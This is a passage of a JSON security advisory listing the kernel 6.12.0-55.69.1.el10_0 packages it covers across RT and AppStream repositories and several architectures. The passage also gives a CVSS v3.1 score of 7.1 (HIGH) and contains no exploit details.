"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
